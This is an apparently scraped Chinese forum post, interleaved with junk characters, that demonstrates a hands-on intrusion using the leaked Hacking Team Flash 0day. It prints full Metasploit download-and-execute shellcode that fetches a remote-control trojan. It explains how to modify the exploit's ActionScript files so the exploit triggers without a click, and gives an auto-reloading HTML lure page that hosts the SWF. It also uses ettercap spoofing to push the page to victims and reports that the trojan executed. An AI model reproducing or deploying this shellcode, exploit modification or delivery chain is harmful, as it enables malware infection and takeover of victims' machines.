|
. U! X" g8 E* o0 W4 [- b
三、flash 0day之手工代码修改制作下载者实例入侵演示 + ^+ U Q* s$ f4 @3 F8 m: ~
5 R! x% w8 V9 x6 e$ t
" r" W, j4 J: a6 v. X" a/ V0 Z7 C" f; ^5 k
利用到的工具:
3 O9 O9 Y$ K8 t( ?8 z
b! D: c+ g- q9 I2 U! m( T" Z
4 P A5 R. f m. h% l' R. U, S Msf
( \3 z9 u9 F9 @. l s' G- C' c0 w
1 V9 F6 e* e$ f9 a& ^+ l! Y1 D' Q0 ~& D
Ettercap
& K- O* q8 H- g5 m9 e% H5 q 9 X5 f J' }/ A# w- I; A
* K* N/ \* J" U Adobe Flash CS6
% g, A. T5 Y1 a
' a0 x4 A' @; L; H: T8 r; _) y2 ^$ Y# ?, x2 o+ y1 E0 C: S
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 - A5 b" j7 w7 Q6 h
7 j0 A5 P5 z, j ~9 Q! w7 H- D9 t
% d' |: ?# U) D5 V. L" e 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options . B( E1 s/ T7 Q. P9 b( g1 U
- x! m2 L0 v0 x! u( o( m
% t5 P$ N0 Q9 s' n2 T
如图:
1 c5 X. n5 q' \ + B; h5 ^9 O/ S- V! q/ h
' z& s9 I. f, K7 b5 H# e. W+ v
$ F5 C% Q; X% E8 z1 d* a6 q# O; a
3 Z p5 | N, t+ A) b. X$ H, V) d" ]/ W3 E' v
' m0 T9 ^* Y$ d
8 O9 o' f6 B* b9 d7 v& N z5 B; p6 s( v
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: ' o& L) X4 H$ W% |1 g" R3 l
+ f8 V) J* f- ~2 r9 y- b3 |+ O+ s- s* g1 H+ M# h+ ~0 {& W
' v3 V3 i; u7 L , R- Y+ o4 o" l3 h
: g. D/ t ^& n+ R6 f
 + t x- P5 \* c2 g' c
8 E0 T' ]2 M$ _7 T* h- v
$ J# m) _( x$ j: F7 } 然后执行generate -t dword生成shellcode,如下: 2 W2 k0 M' Y" @& X, x! q* y
% h& J5 A: U/ v0 ]! j) J' g
2 ?0 \: h2 {" G2 w( ^ o& b3 G  6 |& h7 A( y; B( h9 Y. H+ I$ M8 ~
- m% k- l/ h5 x$ m0 I( ^$ z2 Z; s+ i6 c: @ ]( A& l
复制代码到文本下便于我们一会编辑flash exp,如下: : i* j- S5 ^) a q
0 g. o/ w4 s1 h. a1 i- N
; C6 t1 i2 o# F6 @6 Q3 D 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 0 t4 f" j: Q0 I$ c
+ j. n9 q2 l2 ~5 ^8 G% C
+ W0 X/ E- j" H4 K# Y# {2 C 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
# p, j0 R7 F) n4 ]6 L0 C+ ]0 w b% _7 Q 4 K- R- a+ R! Y
( _' q; e; c4 K& e' S) p' P 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 9 }4 m. q7 j6 \/ q7 m$ h. a- v
" C( f0 J# e8 H: M" ~$ F5 q2 u8 O. i. M7 q% P1 n6 ~9 C" U+ q8 c3 i
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, - l, ~8 z! S% A2 V1 Y, F
+ k: m% @! C5 W& l
7 f$ V/ {% d( V' J: f5 Y 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
+ K: T) u& l8 ^' T2 f
: Z, x+ p6 N! _, x5 l) A; I; n9 h8 ]# d" ]% y& a. C% Q
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 6 y) A7 k* @) s) `
8 O& ^8 w: \; d. b! A. C: y' l, d) ?# a- G0 J$ H
0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
5 h \$ S. B2 c7 k2 p7 p
9 Q [: c0 }6 v" T) B, ~% I' ]0 o: F {6 }# l& g6 |
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, ' A5 U: g0 e1 h5 J6 s5 u F
- y# W, L' {% J! h/ F8 X4 O
) P* C- H" M$ K" ?! Q/ C7 G9 ^ 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
+ d) g# r* o! Z2 ~, I! G/ ?
$ p/ M( A( L; m1 O/ K$ Q
" W6 X0 d. C1 ?5 o/ `: b0 c 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, ' }; \' _+ I* M
3 g' C; `. e+ z5 q" z- ]
- M% q! u; a! w Q) _! S 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 3 |4 e$ c$ m) \5 e0 a
0 ^8 F; B& X" a! h) o W
7 V, A9 y0 W' R. r/ l4 ` 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
4 R8 v& H8 V* `# x+ ]; C , O6 F" P) J; h5 N
8 k; }4 I; x4 O# J5 {; h4 b 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
: p0 \% c I& }& T+ g' |3 M) } . c8 j$ ]& ~4 j8 l9 x, v: o9 p& k1 B' A
" e) v& v, @* {" p' R
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 # M" [4 R, n. z2 w! @3 n+ J7 _' o
6 s# m: m4 u' T6 F! o
! C- y& W6 `# |8 W ?& ^
: _( [8 }% I2 ?1 T% \
- t" L# t7 N5 \" {# O# R6 G/ l6 u: y* c
4 @: S5 g& m. Q8 ]* f; |" I, G
! k% C6 c5 |, q7 c% v
- \; r$ N8 p5 z# b$ \ 下面我们来修改flash 0day exp,需要修改三个文件,分别为: % a# ], z* H# |
, M* H7 b- J: L/ l
/ H5 m, f8 H$ @( D, J8 X6 v  # k: P+ o/ o+ \1 N, B0 F: {, `1 ]( k
6 P9 A- h6 J5 P+ V
. J- U# L5 O& Y 先修改ShellWin32.as,部分源代码如图:
0 K9 f& s$ _# l! _/ v ) ]0 G3 n+ ~& ?
4 x8 {3 @9 t+ l! Y0 ]  / ~% H4 F- L5 U! p
7 D, ~3 k0 v A7 M- Z- ]/ N! X1 _/ m+ U) M: [- P
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: : [) t0 R- c+ Z# ~ M* k6 m( k
1 y9 z0 H1 ~6 N5 w) q/ S" |( b
$ E% ]7 w$ y p1 A, H 
( `( U* k: ] [9 M4 x5 m 3 B5 O. E6 b: A3 }7 B
8 T% w6 _" P( A3 {, _ 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: 5 n5 H4 o) a. E+ T) U
" V( N% N6 Y& C) _; o( o
/ d3 Q. A; R/ `! c* ^ ]# N* I 
" C" x4 q/ E4 w- P1 B z 3 A4 `8 ~& K, K8 B: c5 ~- J$ ]. P
, g7 o* k& Y9 D2 T 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: * s# r! y0 G' q4 I( U1 m0 u
- j6 Q$ O1 Y6 f4 Z0 f( d( s; \: ?+ E
: ?; P* i+ x3 _& z! _
/ j' E0 Z/ _/ L0 ~, n 3 c* s7 a" K- V6 \9 V
% y% j% C b) |1 T7 o/ o
/ B7 U4 o" n! T( g ; u0 U% U) y& U8 J! V& b2 \
1 b) j) M9 ]6 s! c h/ {. ]* a  & [8 @! A. y8 C: }
7 O& J% h" @& k! n2 ?$ K; ^2 ?/ u, M/ T
然后点保存,下面我们来编译一下,打开 ; X& O7 R; p7 j% L. p
4 @& M) E* t& R" t" B- H/ k4 A
6 F, F5 {1 s* C: z exp1.fla然后点文件-发布,看看编译没错误 $ Z) y9 K2 v1 z, t- R6 F/ H
- {+ o0 l$ O2 M
- h+ N0 p; Q. x! O" I
, o+ O- X8 Z9 x8 a9 m0 C w9 Q/ s0 ?/ X" y0 i U$ M/ R
" {" r) f1 m: V# Z5 K) W. n& t5 S' \
4 O9 V, m; X7 r, ~) \. J @3 O
1 {: @7 h2 K8 k( l+ ?8 H
% U. P' M) D- G
, l- u7 l/ d. K* U5 b0 n: ^
) I. O, r8 z# S# W- O
6 ~9 F2 Z, l Y2 T$ l- H. x: x" a5 n" I 
/ Z* k# i) C" v9 O$ P3 M. T 7 c9 e+ ]' G: Z" B3 x
: j7 A" R+ e4 u6 v6 ~/ f 然后我们把生成的
7 g8 ?& P/ o P; ]4 p; e
+ i3 \2 Y& u% P# ~* v, i
" {: d# ^) F2 i0 ^/ S) O; K exp1.swf丢到kailinux 的/var/www/html下:
! [) o% y' z* q" y5 m% R: H9 r
$ |" Y% g, L7 T" i1 n, |+ J; n, I$ Z. U- k6 [$ e0 j
然后把这段代码好好编辑一下 + T' b U/ g" p5 u) n, v0 T
. p9 ~, O9 P$ R# A
# ?6 i6 x9 { h% ^
5 f& E4 [8 y' Z F$ X k
% i$ A. c% D# b/ F& \/ B
, P2 f: E( T$ L$ r0 ]3 r9 j , i9 F' S0 Y: I) p0 B; _
8 d5 ^; S; B5 }; \, y1 d' `& c3 x$ J. q
. v' G# w% M4 \- g& Q, N c1 @* r& K8 Z; W, N* s
) Z; [# A& m; R4 ]4 l
6 v6 C* K0 `5 Y6 z$ ]5 F% H
: k; `& n' v) m* J- E; X
9 a. X! y" v l8 V; {
+ W% Q' c8 t2 K! n' o! a7 n/ V( Q 6 U7 N8 I, _9 P3 I8 g: X
; f$ A2 d6 K9 j9 W4 C
" ?! X0 U Q5 F3 H3 Y% ^! E + @8 ?, _5 e" Q
5 k5 b Z( Y0 b+ Y <!DOCTYPE html>
5 A% B" E& A0 D$ p
" X3 \+ n% \% [- P
8 f+ c6 T9 |# G6 v- d! J <html>
7 h2 e+ r4 }$ o- z1 z
$ t* o; m6 x& i0 a) w* F# ?
4 H: A. Z/ |2 X <head>
- w+ P! p. m5 t; Q, Q ! n1 e4 e. U# V/ I( P J* Q; @0 p
# ~/ }* f& R2 d) r$ a. {; m <meta http-equiv="Content-Type" content="text/html;
X- D6 p- j$ K- z2 |
# ~2 g# h6 x' H) h i& f3 U0 J) \' h* n; H' q
charset=utf-8"/> ( h; N7 G4 c* {9 Z5 X( W
5 _+ g4 r( c& U3 E, ]- b& b0 K
- b% B9 b6 p4 Z# e! G </head> ' g; y1 @3 u, q/ r
& Q- U) ]! [2 _4 Q8 C+ N; m& o3 `# S1 y9 M* D5 r/ P, ^ i
<body>
4 p7 ~2 w( n: Z' j8 u 9 t5 p7 i5 I+ U- r7 e
% o }5 w& N7 A% k& U$ V <h2> Please wait, the requested page is loading...</h2> + _5 J- [0 j. \
/ P% Q: u V. p7 L5 u# V7 r, I; q; e
<br>
; R" x: C8 L Q) _, R
. w' q2 _& U. _
! M* L9 w' L. c2 ?2 U <OBJECT
! Q% m( h1 ^ ^- {
" h. [6 n# q% ]- G* M+ v0 t# e5 \$ U
classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie . S) n l1 X e& x: J7 B
u/ }! ^% {4 K' @# s1 p
0 o4 C, a' @& e0 E VALUE="http://192.168.0.109/exp1.swf"></OBJECT> ; H) G! y7 O1 D9 v1 F8 v- v
G" I, o) n3 h5 v& I$ j8 ~) e
$ W' a2 v O8 H8 z/ n </body>
; R8 d; K' F8 h0 t* t 8 n" h+ \& k o
, _( f4 j' w+ z) P
<script> 1 Z7 l6 j- R/ P
5 G1 ^; D. i; {5 t+ S& r' K
( J3 A% G2 p9 d, K/ E4 s9 E
setTimeout(function () { ) ^5 q' e4 T% Q: \
: }2 D" X9 H; T1 p b8 X; M. [ I" V9 h) H: l
4 O( I p7 F; F3 a, E; s: `! n : E. r( y. x6 I" o+ s
- y* j5 L4 c, B9 N window.location.reload();
7 G' y2 Y; }" m) {: G7 H; A
. p$ }6 y4 P4 v Y* L# y- n: i& V% n1 z$ l. B& w$ i
}, 10000); ! n6 Q! x% j! v! _! Q( g
) C# _0 }# g1 k& N& {
$ j. y: N M- L# t
1 U' r, \2 ~0 n# i0 A5 E G# M , F4 T1 [1 N. d2 ]* m1 v/ ]
0 G1 R. _+ L. i/ K+ V
</script>
, |) r# l ~ I# V
; ?: i1 P" I4 k+ o
T1 y% f( i& B( v* @; \! A, h </html> - R4 Z/ i" a" `& Q. d; M) M; C, _
* Y" i9 |! C+ _$ b7 N' W6 \2 V
+ U% W; a! V5 w( A# u
- N$ A- f& a5 Y6 H6 o0 \0 c) l2 U, e # G( t5 ^& t/ t v" A5 ]
) b- l+ s/ O( x: U( G
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
% Z: x: m: p. _& k2 {
5 h4 F! v) k( U7 M5 M! ]0 _8 W$ J: }& S9 Q. f
 ' ?; O \, D! I5 R6 x. X4 C
8 S; v9 v( N$ b# a, X$ M( i& c6 I3 s
1 c( x4 s0 j8 t' v
4 x( V, ~8 y) I% L# A+ b( Y( W, Q# x8 N! Q
2 H' l V7 T7 p ; J+ B( e G, q3 s5 F
- M' y8 W: p- a R }3 J
( T1 \! ]8 i- H% |) n3 P 0 o* u8 t) ?; _5 R1 R+ b. s, h
4 Q* V* _ @' a- V9 j( z' E
" |: \& `+ g3 C* A5 _. _* ~( V ) j5 x3 G. g: l5 @
- H$ U3 F ^# \* U0 @
下面我们用ettercap欺骗如图:
+ k. n: j# T$ [7 G% z! ^% l
, O/ A: W+ P. p5 E! l+ t8 n' h
0 Z3 [4 n. l0 ^  " Q; t* C' Q4 \; |) R8 b
* E% r% r$ n/ |, R0 K6 B5 {0 L- i- N2 ~! Z- S
/ p% @, i2 V) _1 D- h+ e# c0 ?
, y' C$ P4 v s9 w: H, U. R: `
7 z2 B' ~8 R" i4 L; n9 O, Y
下面我们随便访问个网站看看: 4 w1 d0 F* U# N
, v+ G! ]3 p1 E* S& c4 n0 g: L1 C( d, U: n
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: * [- S K( z7 n2 r
9 m7 w) Y$ X) L$ L9 q' B- b9 B8 R
0 w, h$ N0 s! E7 q 
2 R; t2 z# d8 z ) e# ? D: s6 ^: M% J
: u2 N A U8 m, B( G; P+ z! A5 {: r 我们看另一台,
4 m( u9 H, N2 m# B- I & n9 P/ j' p, r
+ ?3 j" I& [% I8 \- O# e
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。
% u% P5 i6 b6 j | 
发表于 2018-10-20 20:28:55
收藏
支持
反对